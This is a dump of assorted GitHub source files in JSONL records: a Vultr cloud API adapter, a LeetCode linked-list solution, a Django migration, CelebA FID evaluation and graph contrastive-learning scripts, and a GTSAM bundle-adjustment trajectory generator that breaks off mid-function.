__del__(self):\n# try:\n# logging.info(\"start close macssh\")\n# self.mac_ssh.close()\n# except Exception as e:\n# logger.error(e)\n\n\nif __name__ == '__main__':\n # device = Tidevice(serialno=\"00008110-0002398A36B8801E\", device_addr=\"http://10.130.131.82:20020?mjpeg_port=20019\",\n # tidevice_path=\"/Users/pirate/opt/anaconda3/bin/python -m tidevice\")\n # stdout = device.cmd(\"applist\")\n # print(\"sdfs\", stdout.decode())\n pass\n","repo_name":"Hanlen520/app_performance-1","sub_path":"performancetest/core/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":7468,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"74616894651","text":"import base64\nimport os\nfrom dataclasses import asdict\nfrom typing import List, Optional\n\nimport requests\nfrom scalr.cloud import CloudAdapter, GenericCloudInstance\nfrom scalr.log import log\n\nVULTR_API_KEY: str = str(os.getenv(\"VULTR_API_KEY\"))\n\n\nclass Vultr:\n\n VULTR_API_URL: str = \"https://api.vultr.com/v2\"\n\n def __init__(self, api_key: str) -> None:\n self.api_key = api_key\n\n def query_api(\n self,\n method: str,\n path: str,\n params: Optional[dict] = None,\n json: Optional[dict] = None,\n ) -> requests.Response:\n r = requests.request(\n method=method,\n url=f\"{self.VULTR_API_URL}/{path}\",\n headers={\n \"Authorization\": f\"Bearer {self.api_key}\",\n \"Content-Type\": \"application/json\",\n },\n params=params,\n json=json,\n timeout=10,\n )\n r.raise_for_status()\n return r\n\n def list_instances(self, tag=None, label=None) -> List[dict]:\n params = {\n \"tag\": tag,\n \"label\": label,\n }\n r = self.query_api(\"get\", \"instances\", params=params)\n return r.json().get(\"instances\", dict())\n\n def start_instance(self, instance_id: str) -> None:\n self.query_api(\"post\", f\"instances/{instance_id}/start\")\n\n def delete_instance(self, instance_id: str) -> None:\n self.query_api(\"delete\", f\"instances/{instance_id}\")\n\n def create_instance(\n self,\n region,\n plan,\n os_id: Optional[str] = None,\n script_id: Optional[str] = None,\n iso_id: Optional[str] = None,\n snapshot_id: Optional[str] = None,\n enable_ipv6: Optional[bool] = None,\n attach_private_network: Optional[List[str]] = None,\n label: Optional[str] = None,\n sshkey_id: Optional[List[str]] = None,\n backups: Optional[str] = None,\n app_id: Optional[str] = None,\n image_id: Optional[str] = None,\n user_data: Optional[str] = None,\n ddos_protection: Optional[bool] = None,\n activation_email: Optional[bool] = None,\n hostname: Optional[str] = None,\n tag: Optional[str] = None,\n firewall_group_id: Optional[str] = None,\n enable_private_network: Optional[bool] = None,\n ) -> dict:\n\n if user_data:\n user_data = base64.b64encode(user_data.encode(\"utf-8\")).decode(\"utf-8\")\n\n json = {\n \"region\": region,\n \"plan\": plan,\n \"os_id\": os_id,\n \"script_id\": script_id,\n \"iso_id\": iso_id,\n \"snapshot_id\": snapshot_id,\n \"enable_ipv6\": enable_ipv6,\n \"attach_private_network\": attach_private_network,\n \"label\": label,\n \"sshkey_id\": sshkey_id,\n \"backups\": backups,\n \"app_id\": app_id,\n \"image_id\": image_id,\n \"user_data\": user_data,\n \"ddos_protection\": ddos_protection,\n \"activation_email\": activation_email,\n \"hostname\": hostname,\n \"tag\": tag,\n \"firewall_group_id\": firewall_group_id,\n \"enable_private_network\": enable_private_network,\n }\n r = self.query_api(\"post\", \"instances\", json=json)\n return r.json().get(\"instance\", dict())\n\n\nclass VultrCloudAdapter(CloudAdapter):\n def __init__(self):\n super().__init__()\n self.vultr = Vultr(api_key=str(os.getenv(\"VULTR_API_KEY\")))\n\n def get_current_instances(self) -> List[GenericCloudInstance]:\n filter_tag = f\"scalr={self.filter}\"\n log.info(f\"vultr: Querying with filter_tag: {filter_tag}\")\n servers = self.vultr.list_instances(tag=filter_tag)\n return [\n GenericCloudInstance(\n id=server[\"id\"],\n name=server[\"label\"],\n status=server[\"power_status\"],\n )\n for server in sorted(servers, key=lambda i: i[\"date_created\"])\n ]\n\n def ensure_instances_running(self) -> None:\n log.info(\"vultr: ensure running\")\n\n for instance in self.get_current_instances():\n log.info(f\"vultr: instance {instance.name} status {instance.status}\")\n if instance.status == \"running\":\n continue\n\n if instance.status == \"stopped\":\n try:\n self.vultr.start_instance(instance_id=instance.id)\n log.info(f\"vultr: Instance {instance.name} started\")\n except Exception as ex:\n log.error(ex)\n\n def deploy_instance(self, name: str) -> None:\n log.info(f\"vultr: Deploying new instance named {name}\")\n launch_config = self.launch.copy()\n launch_config.update(\n {\n \"label\": name,\n \"hostname\": name,\n \"tag\": f\"scalr={self.filter}\",\n }\n )\n self.vultr.create_instance(**launch_config)\n\n def destroy_instance(self, instance: GenericCloudInstance) -> None:\n log.info(f\"vultr: Destroying instance {instance}\")\n self.vultr.delete_instance(instance_id=instance.id)\n","repo_name":"ngine-io/scalr","sub_path":"scalr/cloud/adapters/vultr.py","file_name":"vultr.py","file_ext":"py","file_size_in_byte":5150,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"78"} +{"seq_id":"10317725766","text":"'''\n142. Linked List Cycle II\n\nDeepin of 141\n\nFellow\n\n\n'''\n\n# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution(object):\n def detectCycle(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n\n dict = {}\n if None == head:\n return None\n\n cur = head\n dict[cur] = 1\n\n while True:\n if None == cur.next:\n return None\n\n cur = cur.next\n\n try:\n if 1 == dict[cur]:\n return cur\n except KeyError:\n dict[cur] = 1\n\nl1 = ListNode(1)\nl2 = ListNode(2)\nl3 = ListNode(3)\nl4 = ListNode(4)\n\nl1.next = l2\n\n\n\nc = Solution()\nd = c.detectCycle(l1)\nprint(d.val)","repo_name":"ShuaiWang0410/LeetCode-2nd-Stage","sub_path":"LeetCode-Stage2/Linked_List/Problem_142.py","file_name":"Problem_142.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35834847811","text":"import argparse\n\nfrom model import CCA_SSG, LogReg\nfrom aug import random_aug\nfrom dataset import load\n\nimport numpy as np\nimport torch as th\nimport torch.nn as nn\n\nimport warnings\n\nwarnings.filterwarnings('ignore')\n\nparser = argparse.ArgumentParser(description='CCA-SSG')\n\nparser.add_argument('--dataname', type=str, default='cora', help='Name of dataset.')\nparser.add_argument('--gpu', type=int, default=0, help='GPU index.')\nparser.add_argument('--epochs', type=int, default=100, help='Training epochs.')\nparser.add_argument('--lr1', type=float, default=1e-3, help='Learning rate of CCA-SSG.')\nparser.add_argument('--lr2', type=float, default=1e-2, help='Learning rate of linear evaluator.')\nparser.add_argument('--wd1', type=float, default=0, help='Weight decay of CCA-SSG.')\nparser.add_argument('--wd2', type=float, default=1e-4, help='Weight decay of linear evaluator.')\n\nparser.add_argument('--lambd', type=float, default=1e-3, help='trade-off ratio.')\nparser.add_argument('--n_layers', type=int, default=2, help='Number of GNN layers')\n\nparser.add_argument('--use_mlp', action='store_true', default=False, help='Use MLP instead of GNN')\n\nparser.add_argument('--der', type=float, default=0.2, help='Drop edge ratio.')\nparser.add_argument('--dfr', type=float, default=0.2, help='Drop feature ratio.')\n\nparser.add_argument(\"--hid_dim\", type=int, default=512, help='Hidden layer dim.')\nparser.add_argument(\"--out_dim\", type=int, default=512, help='Output layer dim.')\n\nargs = parser.parse_args()\n\n# check cuda\nif args.gpu != -1 and th.cuda.is_available():\n args.device = 'cuda:{}'.format(args.gpu)\nelse:\n args.device = 'cpu'\n\nif __name__ == '__main__':\n\n print(args)\n graph, feat, labels, num_class, train_idx, val_idx, test_idx = load(args.dataname)\n in_dim = feat.shape[1]\n\n model = CCA_SSG(in_dim, args.hid_dim, args.out_dim, args.n_layers, args.use_mlp)\n model = model.to(args.device)\n\n optimizer = th.optim.Adam(model.parameters(), lr=args.lr1, weight_decay=args.wd1)\n\n N = graph.number_of_nodes()\n\n for epoch in range(args.epochs):\n model.train()\n optimizer.zero_grad()\n\n graph1, feat1 = random_aug(graph, feat, args.dfr, args.der)\n graph2, feat2 = random_aug(graph, feat, args.dfr, args.der)\n\n graph1 = graph1.add_self_loop()\n graph2 = graph2.add_self_loop()\n\n graph1 = graph1.to(args.device)\n graph2 = graph2.to(args.device)\n\n feat1 = feat1.to(args.device)\n feat2 = feat2.to(args.device)\n\n z1, z2 = model(graph1, feat1, graph2, feat2)\n\n c = th.mm(z1.T, z2)\n c1 = th.mm(z1.T, z1)\n c2 = th.mm(z2.T, z2)\n\n c = c / N\n c1 = c1 / N\n c2 = c2 / N\n\n loss_inv = -th.diagonal(c).sum()\n iden = th.tensor(np.eye(c.shape[0])).to(args.device)\n loss_dec1 = (iden - c1).pow(2).sum()\n loss_dec2 = (iden - c2).pow(2).sum()\n\n loss = loss_inv + args.lambd * (loss_dec1 + loss_dec2)\n\n loss.backward()\n optimizer.step()\n\n print('Epoch={:03d}, loss={:.4f}'.format(epoch, loss.item()))\n\n print(\"=== Evaluation ===\")\n graph = graph.to(args.device)\n graph = graph.remove_self_loop().add_self_loop()\n feat = feat.to(args.device)\n\n embeds = model.get_embedding(graph, feat)\n\n train_embs = embeds[train_idx]\n val_embs = embeds[val_idx]\n test_embs = embeds[test_idx]\n\n label = labels.to(args.device)\n\n train_labels = label[train_idx]\n val_labels = label[val_idx]\n test_labels = label[test_idx]\n\n train_feat = feat[train_idx]\n val_feat = feat[val_idx]\n test_feat = feat[test_idx]\n\n ''' Linear Evaluation '''\n logreg = LogReg(train_embs.shape[1], num_class)\n opt = th.optim.Adam(logreg.parameters(), lr=args.lr2, weight_decay=args.wd2)\n\n logreg = logreg.to(args.device)\n loss_fn = nn.CrossEntropyLoss()\n\n best_val_acc = 0\n eval_acc = 0\n\n for epoch in range(2000):\n logreg.train()\n opt.zero_grad()\n logits = logreg(train_embs)\n preds = th.argmax(logits, dim=1)\n train_acc = th.sum(preds == train_labels).float() / train_labels.shape[0]\n loss = loss_fn(logits, train_labels)\n loss.backward()\n opt.step()\n\n logreg.eval()\n with th.no_grad():\n val_logits = logreg(val_embs)\n test_logits = logreg(test_embs)\n\n val_preds = th.argmax(val_logits, dim=1)\n test_preds = th.argmax(test_logits, dim=1)\n\n val_acc = th.sum(val_preds == val_labels).float() / val_labels.shape[0]\n test_acc = th.sum(test_preds == test_labels).float() / test_labels.shape[0]\n\n if val_acc >= best_val_acc:\n best_val_acc = val_acc\n if test_acc > eval_acc:\n eval_acc = test_acc\n\n print('Epoch:{}, train_acc:{:.4f}, val_acc:{:4f}, test_acc:{:4f}'.format(epoch, train_acc, val_acc, test_acc))\n\n print('Linear evaluation accuracy:{:.4f}'.format(eval_acc))\n","repo_name":"hengruizhang98/CCA-SSG","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4978,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"78"} +{"seq_id":"4241292836","text":"from collections import Counter\r\n# This signature is required for the automated grading to work.\r\n# Do not rename the function or change its list of parameters!\r\ndef min_domino_rotations(top, bottom):\r\n\r\n top_dict = {index: item for index, item in enumerate(top)}\r\n btm_dict = {index: item for index, item in enumerate(bottom)}\r\n # print(top_dict)\r\n # print(btm_dict)\r\n\r\n combined_dict = {}\r\n for key in top_dict.keys() | btm_dict.keys():\r\n combined_dict[key] = [top_dict.get(key, None), btm_dict.get(key, None)]\r\n common_numbers = set(combined_dict[0])\r\n for key in combined_dict:\r\n common_numbers = common_numbers.intersection(set(combined_dict[key]))\r\n # Check if it's possible to complete or not\r\n if len(common_numbers) == 0:\r\n return -1\r\n common_number_list = []\r\n for element in common_numbers:\r\n common_number_list.append(element)\r\n\r\n temp_lists = [0] * len(common_number_list)\r\n for number in common_number_list:\r\n index = 0\r\n for value in top_dict.values():\r\n if value != number:\r\n temp_lists[index] += 1\r\n index += 1\r\n\r\n temp2_lists = [0] * len(common_number_list)\r\n for number in common_number_list:\r\n index = 0\r\n for value in btm_dict.values():\r\n if value != number:\r\n temp2_lists[index] += 1\r\n index += 1\r\n\r\n # print(temp_lists)\r\n # print(temp2_lists)\r\n\r\n combined_list = temp_lists + temp2_lists\r\n answer = min(combined_list)\r\n \r\n return answer\r\n\r\n# The following line calls the function which will print # value to the Console.\r\n# This way you can check what it does.\r\n# However, we encourage you to write tests, because then you\r\n# can easily test many different values on every \"Test & Run\"!\r\n\r\nprint(min_domino_rotations([2, 6, 2, 1, 2, 2], [5, 2, 4, 2, 3, 2]))\r\nprint(min_domino_rotations([3, 5, 1, 2, 6], [3, 6, 3, 3, 6]))\r\n\r\n# [2, 6, 2, 1, 2, 2]\r\n# [5, 2, 4, 2, 3, 2]","repo_name":"Pyrexiaa/UZH_Informatics_Answers","sub_path":"assignment_5/q7.py","file_name":"q7.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35791627580","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cms', '0014_auto_20160404_1908'),\n ('djangocms_repeater', '0013_singleheader'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Button',\n fields=[\n ('cmsplugin_ptr', models.OneToOneField(parent_link=True, serialize=False, primary_key=True, to='cms.CMSPlugin', auto_created=True)),\n ('buttonText', models.CharField(max_length=100, default='Button Text')),\n ('buttonURL', models.URLField()),\n ('buttonColour', models.CharField(max_length=10, default='blue', choices=[('teal', 'Teal'), ('orange', 'Orange'), ('red', 'Red'), ('blue', 'Blue')])),\n ],\n options={\n 'abstract': False,\n },\n bases=('cms.cmsplugin',),\n ),\n ]\n","repo_name":"womenhackfornonprofits/seo-london","sub_path":"djangocms_repeater/migrations/0014_button.py","file_name":"0014_button.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"26183004069","text":"import os\nimport sys\nimport argparse\nimport numpy as np\nimport logging\nimport tensorflow as tf\nimport numpy as np\nimport random\nimport torch\nimport torch.autograd as autograd\nimport torch.optim as optim\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\nimport frechet_inception_distance as FID\n\nsys.path.insert(0, './../source')\nfrom utils_celeba_gender import mkdir\nfrom CelebA import MyCelebA\n\nImg_W = Img_H = 32\nImg_C = 3\nDATA_ROOT = './../data'\nSTAT_DIR = './stats'\n\n\n#############################################################################################################\n# get and save the arguments\n#############################################################################################################\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset', '-data', type=str, default='celeba', choices=['celeba'],\n help=' dataset name')\n parser.add_argument('--gen_data', type=str,\n default='./../results/celeba_gender/main/ResNet_default/gen_data.npz',\n help='path of file that store the generated data')\n parser.add_argument('--save_dir', type=str,\n help='output folder name; will be automatically save to the folder of gen_data if not specified')\n parser.add_argument('--num_eval_samples', type=int, default=20000,\n help=\"number of samples to be evaluated\")\n args = parser.parse_args()\n return args\n\n\n##########################################################################\n### helper functions\n##########################################################################\ndef convert_data(data, Img_W, Img_H, Img_C):\n shape = data.shape\n if len(shape) == 2:\n data = np.reshape(data, [-1, Img_W, Img_H, Img_C])\n elif len(shape) == 3:\n data = np.reshape(data, [-1, Img_W, Img_H, Img_C])\n elif len(shape) == 4:\n if shape[1] == Img_C:\n data = np.transpose(data, [0, 2, 3, 1])\n\n if Img_C == 1:\n data = np.tile(data, [1, 1, 1, 3])\n return data * 255\n\ndef inf_train_gen(trainloader):\n while True:\n for images, targets in trainloader:\n yield (images, targets)\n\ndef load_celeba(selection='train_val'):\n transform_train_celeba = transforms.Compose([transforms.Resize((32,32)), transforms.ToTensor()])\n dataloader = MyCelebA\n \n if selection == 'train':\n trainset = dataloader(root=DATA_ROOT, split='train', download=False, transform=transform_train_celeba)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=len(trainset), drop_last=False, shuffle=False)\n input_data = inf_train_gen(trainloader)\n real_data, real_y = next(input_data)\n x = real_data.cpu().detach().numpy()\n y = real_y.cpu().detach().numpy()\n \n elif selection == 'train_val':\n trainset = dataloader(root=DATA_ROOT, split='train', download=False, transform=transform_train_celeba)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=len(trainset), drop_last=False, shuffle=False)\n input_data_train = inf_train_gen(trainloader)\n real_data_train, real_y_train = next(input_data_train)\n x_train = real_data_train.cpu().detach().numpy()\n y_train = real_y_train.cpu().detach().numpy() \n\n valset = dataloader(root=DATA_ROOT, split='valid', download=False, transform=transform_train_celeba)\n valloader = torch.utils.data.DataLoader(valset, batch_size=len(valset), drop_last=False, shuffle=False)\n input_data_val = inf_train_gen(valloader)\n real_data_val, real_y_val = next(input_data_val)\n x_val = real_data_val.cpu().detach().numpy()\n y_val = real_y_val.cpu().detach().numpy() \n \n x = np.concatenate([x_train, x_val])\n y = np.concatenate([y_train, y_val])\n \n elif selection == 'test':\n testset = dataloader(root=DATA_ROOT, split='test', download=False, transform=transform_train_celeba)\n testloader = torch.utils.data.DataLoader(testset, batch_size=len(testset), drop_last=False, shuffle=False)\n input_data = inf_train_gen(testloader)\n real_data, real_y = next(input_data)\n x = real_data.cpu().detach().numpy()\n y = real_y.cpu().detach().numpy()\n \n elif selection == 'val':\n valset = dataloader(root=DATA_ROOT, split='valid', download=False, transform=transform_train_celeba)\n valloader = torch.utils.data.DataLoader(valset, batch_size=len(valset), drop_last=False, shuffle=False)\n input_data = inf_train_gen(valloader)\n real_data, real_y = next(input_data)\n x = real_data.cpu().detach().numpy()\n y = real_y.cpu().detach().numpy()\n \n print('data shape', x.shape, y.shape)\n print('data range:', np.min(x), np.max(x))\n return x, y\n\n##########################################################################\n### main\n##########################################################################\ndef main(args):\n ### Get real data statistics\n stat_file = os.path.join(STAT_DIR, args.dataset, 'stat.npz')\n if not os.path.exists(stat_file):\n if args.dataset == 'celeba':\n real_data, _ = load_celeba('train_val')\n real_data = convert_data(real_data, Img_W, Img_H, Img_C)\n m1, s1, real_act = FID.calculate_activation(real_data)\n\n ## Save real statistics\n mkdir(os.path.join(STAT_DIR, args.dataset))\n np.savez(stat_file, mu=m1, sigma=s1, real_act=real_act)\n else:\n ## Load pre-computed statistics\n f = np.load(stat_file)\n m1, s1 = f['mu'][:], f['sigma'][:]\n real_act = f['real_act']\n print(m1.shape)\n print(s1.shape)\n print(real_act.shape)\n\n ### load gen data\n gen_data = np.load(args.gen_data)\n x_gen = gen_data['data_x']\n x_gen = convert_data(x_gen, Img_W, Img_H, Img_C)\n rand_perm = np.random.permutation(len(x_gen))\n x_gen = x_gen[rand_perm]\n x_gen = x_gen[:args.num_eval_samples]\n print(x_gen.shape)\n print(np.min(x_gen), np.max(x_gen))\n\n ### Get fake data statistics and compute FID\n m2, s2, fake_act = FID.calculate_activation(x_gen)\n fid_value = FID.calculate_frechet_distance(m1, s1, m2, s2)\n infostr = 'fid value: {}'.format(fid_value)\n print(infostr)\n\n\n\nif __name__ == '__main__':\n args = parse_arguments()\n main(args)\n","repo_name":"chenchen-usyd/DP-GAN-DPAC","sub_path":"evaluation/eval_celeba_fid.py","file_name":"eval_celeba_fid.py","file_ext":"py","file_size_in_byte":6525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"31142306894","text":"import numpy as np\nfrom torch.utils.data import IterableDataset\nimport zarr\n\n\nclass PlanarCubeLatentDataset(IterableDataset):\n def __init__(self, zarr_path: str):\n data = zarr.open(zarr_path)\n self._states = np.asarray(data.states)\n self._latents = np.asarray(data.latents)\n\n def __len__(self):\n return len(self._states)\n\n def __iter__(self, override_idx=None):\n while True:\n idx = (\n override_idx\n if override_idx is not None\n else np.random.randint(0, len(self._states))\n )\n yield self._latents[idx], self._states[idx]\n","repo_name":"nepfaff/state_encoder_3d","sub_path":"state_encoder_3d/dataset/planar_cube_latent_dataset.py","file_name":"planar_cube_latent_dataset.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3227065859","text":"from sys import argv\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport bz2\nfrom tqdm import tqdm as tm\nfrom scipy.spatial.transform import Rotation as R\nimport gtsam \n\ndef get_traj():\n X, Y, Z = [50], [50], [50]\n length = 10\n poses = 20\n step = float(length)/poses\n for idx in range(5):\n for _ in range(1,poses):\n X.append(X[len(X)-1])\n Y.append(Y[len(Y)-1])\n Z.append(Z[len(Z)-1])\n if idx==0:\n X[len(X)-1] = X[len(X)-1] + step\n elif idx==1:\n Y[len(Y)-1] = Y[len(Y)-1] + step\n elif idx==2:\n Z[len(Z)-1] = Z[len(Z)-1] - step\n elif idx==3:\n X[len(X)-1] = X[len(X)-1] - step\n elif idx==4:\n Z[len(Z)-1] = Z[len(Z)-1] + step\n \n LT = [np.eye(4)]\n LT[0][:3,:3] = R.from_euler('y',90, True).as_matrix()\n LT[0][:3,3] = np.array([X[0],Y[0],Z[0]])\n for idx in range(5):\n for _ in range(1, poses):\n lt_idx = len(LT)-1\n LT.append(np.array(LT[len(LT)-1]))\n lt_idx = len(LT)-1\n LT[lt_idx][:3,3] = np.array([X[lt_idx],Y[lt_idx],Z[lt_idx]])\n rot = np.eye(4)\n if idx==0:\n axis = 'x'\n deg = 270\n elif idx==1:\n axis='y'\n deg = 90\n elif idx==2:\n axis='x'\n deg = 270\n elif idx==3:\n axis='x'\n deg = 270\n elif idx==4:\n axis='y'\n deg = 90 \n rot[:3,:3] = R.from_euler(axis,deg, True).as_matrix()\n LT[len(LT)-1] = LT[len(LT)-1] @ rot\n \n Qx, Qy, Qz, Qw = [], [], [], []\n for T in LT:\n [qx, qy, qz, qw] = R.from_matrix(T[:3,:3]).as_quat()\n Qx.append(qx)\n Qy.append(qy)\n Qz.append(qz)\n Qw.append(qw)\n \n val = 2\n LDMK = [\n [X[(poses-1)]+np.random.uniform(val,1.5*val), Y[(poses-1)]+np.random.uniform(-val,val), Z[(poses-1)]+np.random.uniform(-val,val)],\n [X[2*(poses-1)]+np.random.uniform(-val,val), Y[2*(poses-1)]+np.random.uniform(val,1.5*val), Z[2*(poses-1)]+np.random.uniform(-val,val)],\n [X[3*(poses-1)]+np.random.uniform(-val,val), Y[3*(poses-1)]+np.random.uniform(-val,val), Z[3*(poses-1)]+np.random.uniform(-1.5*val,-val)],\n [X[4*(poses-1)]+np.random.uniform(-1.5*val,-val), Y[4*(poses-1)]+np.random.uniform(-val,val), Z[4*(poses-1)]+np.random.uniform(-val,val)],\n [X[5*(poses-1)]+np.random.uniform(-val,val), Y[5*(poses-1)]+np.random.uniform(-val,val), Z[5*(poses-1)]+np.random.uniform(val,1.5*val)],\n # [X[6*(poses-1)]+np.random.uniform(-val,val), Y[6*(poses-1)]+np.random.uniform(-1.5*val,-val), Z[6*(poses-1)]+np.random.uniform(-val,val)],\n ]\n\n\n K = gtsam.Cal3_S2(565.6008952774197, 565.6008952774197, 1000.0 ,320.5, 240.5 )\n measurement = []\n for idx in range(len(X)):\n if idx < (poses-1):\n lidx = 0\n elif idx<2*(poses-1):\n lidx=1\n elif idx<3*(poses-1):\n lidx=2\n elif idx<4*(poses-1):\n lidx=3\n elif idx<5*(poses-1):\n lidx=4\n else:\n break\n \n camera = gtsam.PinholeCameraCal3_S2(gtsam.Pose3(LT[idx]),K)\n point = LDMK[lidx]\n measurement.append([idx, lidx, *camera.project(point)])\n return X, Y, Z, Qx, Qy, Qz, Qw, LDMK, measurement\n\ndef add_noise_ldmk(ldmk):\n noise_ldmk = []\n for idx, L in enumerate(ldmk):\n noise_ldmk.append([\n L[0]+ np.random.uniform(-4,4),\n L[1]+ np.random.uniform(-4,4),\n L[2]+ np.random.uniform(-4,4),\n ])\n return noise_ldmk\n\ndef write_initialisation(filepath, xN, yN, zN, QxN, QyN, QzN, QwN, LDMK, measurements):\n with open(filepath, 'w') as data_file:\n line = str(len(xN)) + ' ' + str(len(LDMK)) + ' ' + str(len(measurements)) + '\\n';\n data_file.write(line);\n for i in range(len(xN)):\n line = str(xN[i]) + ' ' + str(yN[i]) + ' ' + str(zN[i]) + ' ' + str(QxN[i]) + ' ' + str(QyN[i]) + ' ' + str(QzN[i]) + ' ' + str(QwN[i]) + '\\n';\n data_file.write(line);\n for i in range(len(LDMK)):\n line = str(LDMK[i][0]) + ' ' + str(LDMK[i][1]) + ' ' + str(LDMK[i][2]) + '\\n';\n data_file.write(line);\n for i in range(len(measurements)):\n line = str(measurements[i][0]) + ' ' + str(measurements[i][1]) + ' ' + str(measurements[i][2]) + ' ' + str(measurements[i][3]) + '\\n';\n data_file.write(line);\n\ndef read_bal_data(file_name):\n with bz2.open(file_name, \"rt\") as file:\n n_cameras, n_points, n_observations = map(\n int, file.readline().split())\n\n camera_indices = np.empty(n_observations, dtype=int)\n point_indices = np.empty(n_observations, dtype=int)\n points_2d = np.empty((n_observations, 2))\n\n for i in range(n_observations):\n camera_index, point_index, x, y = file.readline().split()\n camera_indices[i] = int(camera_index)\n point_indices[i] = int(point_index)\n points_2d[i] = [float(x), float(y)]\n\n camera_params = np.empty(n_cameras * 9)\n for i in range(n_cameras * 9):\n camera_params[i] = float(file.readline())\n camera_params = camera_params.reshape((n_cameras, -1))\n\n points_3d = np.empty(n_points * 3)\n for i in range(n_points * 3):\n points_3d[i] = float(file.readline())\n points_3d = points_3d.reshape((n_points, -1))\n\n return camera_params, points_3d, camera_indices, point_indices, points_2d\n\ndef rotation_matrix(rot_vec):\n theta = np.linalg.norm(rot_vec)\n with np.errstate(invalid='ignore'):\n v = rot_vec / theta\n v = np.nan_to_num(v)\n cos_theta = np.cos(theta)\n sin_theta = np.sin(theta)\n [v1, v2, v3] = v\n cross_product_mat = np.array([\n [0, -v3, v2],\n [v3, 0, -v1],\n [-v2, v1, 0],\n ])\n rot = cos_theta * np.eye(3)\n rot = rot + sin_theta*cross_product_mat\n rot = rot + (1-cos_theta)*(np.outer(v,v))\n return rot\n \ndef get_poses(r_list, t_list):\n X, Y, Z, Qx, Qy, Qz, Qw = [], [], [], [], [], [], []\n for idx in range(len(r_list)):\n rot_vec = r_list[idx]\n t_vec = t_list[idx]\n X.append(t_vec[0])\n Y.append(t_vec[1])\n Z.append(t_vec[2])\n # R = rotation_matrix(rot_vec)\n [qx, qy, qz, qw] = R.from_rotvec(rot_vec).as_quat()\n Qx.append(qx)\n Qy.append(qy)\n Qz.append(qz)\n Qw.append(qw)\n return X, Y, Z, Qx, Qy, Qz, Qw\n\ndef addNoise(X, Y, Z, Qx, Qy, Qz, Qw):\n\tXN = np.zeros(len(X)); YN = np.zeros(len(Y)); ZN = np.zeros(len(Z))\n\tQxN = np.zeros(len(Qx)); QyN = np.zeros(len(Qy)); QzN = np.zeros(len(Qz)); QwN = np.zeros(len(Qw))\n\n\tXN[0] = X[0]; YN[0] = Y[0]; ZN[0] = Z[0]; QxN[0] = Qx[0]; QyN[0] = Qy[0]; QzN[0] = Qz[0]; QwN[0] = Qw[0]\n\n\tfor i in range(1, len(X)):\n\t\t# Get T2_1\n\t\tp1 = (X[i-1], Y[i-1], Z[i-1], Qx[i-1], Qy[i-1], Qz[i-1], Qw[i-1])\n\t\tp2 = (X[i], Y[i], Z[i], Qx[i], Qy[i], Qz[i], Qw[i])\n\n\t\tR1_w = R.from_quat([p1[3], p1[4], p1[5], p1[6]]).as_matrix()\n\t\tR2_w = R.from_quat([p2[3], p2[4], p2[5], p2[6]]).as_matrix()\n\n\t\tT1_w = np.identity(4)\n\t\tT2_w = np.identity(4)\n\n\t\tT1_w[0:3, 0:3] = R1_w\n\t\tT2_w[0:3, 0:3] = R2_w\n\n\t\tT1_w[0, 3] = p1[0] \n\t\tT1_w[1, 3] = p1[1]\n\t\tT1_w[2, 3] = p1[2]\n\n\t\tT2_w[0, 3] = p2[0]\n\t\tT2_w[1, 3] = p2[1]\n\t\tT2_w[2, 3] = p2[2]\n\n\t\tT2_1 = np.dot(np.linalg.inv(T1_w), T2_w)\n\n\t\tdx, dy, dz = T2_1[0, 3], T2_1[1, 3], T2_1[2, 3]\n\t\tdyaw, dpitch, droll = list(R.from_matrix(T2_1[0:3, 0:3]).as_euler('zyx'))\n\t\t\n\t\t# Add noise\n\t\tif(i<5):\n\t\t\txNoise = 0; yNoise = 0; zNoise = 0; rollNoise = 0; pitchNoise = 0; yawNoise = 0\n\t\telse:\n\t\t\txNoise = 0; yNoise = 0; zNoise = 0; rollNoise = 0.005; pitchNoise = 0.005; yawNoise = 0.005\n\n\t\tdx += xNoise; dy += yNoise; dz += zNoise\n\t\tdyaw += yawNoise; dpitch += pitchNoise; droll += rollNoise\n\n\t\t# Convert to T2_1'\n\t\tR2_1N = R.from_euler('zyx', [dyaw, dpitch, droll]).as_matrix()\n\t\t\n\t\tT2_1N = np.identity(4)\n\t\tT2_1N[0:3, 0:3] = R2_1N\n\n\t\tT2_1N[0, 3] = dx\n\t\tT2_1N[1, 3] = dy\n\t\tT2_1N[2, 3] = dz\n\n\t\t# Get T2_w' = T1_w' . T2_1'\n\t\tp1 = (XN[i-1], YN[i-1], ZN[i-1], QxN[i-1], QyN[i-1], QzN[i-1], QwN[i-1])\n\t\tR1_wN = R.from_quat([p1[3], p1[4], p1[5], p1[6]]).as_matrix()\n\t\t\n\t\tT1_wN = np.identity(4)\n\t\tT1_wN[0:3, 0:3] = R1_wN\n\n\t\tT1_wN[0, 3] = p1[0] \n\t\tT1_wN[1, 3] = p1[1]\n\t\tT1_wN[2, 3] = 